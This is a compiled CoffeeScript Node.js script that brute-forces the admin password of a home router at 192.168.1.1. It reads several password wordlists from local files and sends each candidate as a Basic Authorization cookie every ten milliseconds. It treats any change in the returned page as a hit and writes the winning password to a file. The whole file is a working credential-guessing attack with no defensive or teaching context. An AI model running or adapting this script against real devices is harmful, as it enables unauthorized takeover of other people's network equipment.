// Generated by CoffeeScript 1.10.0
var data, fs, req, rou, url;

req = require('request');

rou = require('./router');

fs = require('fs');

data = [];

data = data.concat(JSON.parse(fs.readFileSync('./rkolin.js'))['data']);

data = data.concat(JSON.parse(fs.readFileSync('./rkolin1.js'))['data']);

data = data.concat(JSON.parse(fs.readFileSync('./rkolin2.js'))['data']);

data = data.concat(JSON.parse(fs.readFileSync('./rkolin3.js'))['data']);

data = data.concat(JSON.parse(fs.readFileSync('./rkolin4.js'))['data']);

url = 'http://192.168.1.1';

req(url, function(error, response, body) {
  var closure, f;
  if (!error && response.statusCode === 200) {
    f = function() {
      var main, n, page;
      n = 11000;
      page = body.slice(-2000);
      fs.writeFileSync('page.html', page);
      main = function() {
        var auth, cookie, j, psw, ref;
        psw = data[n++];
        if ((6 < (ref = psw.length) && ref < 15)) {
          j = req.jar();
          auth = "Basic " + rou.Base64Encoding("admin:" + psw);
          cookie = req.cookie("Authorization=" + escape(auth) + ";path=/");
          j.setCookie(cookie, url);
          return req({
            'url': url,
            'jar': j
          }, function(error, response, bd) {
            bd = bd.slice(-2000);
            if (bd !== page) {
              console.log(psw + '  iiiiiiiiiii');
              fs.writeFileSync('psw.txt', psw);
              return ddd;
            } else {
              return console.log(n);
            }
          });
        }
      };
      return main;
    };
    closure = f();
    return setInterval(closure, 10);
  }
});
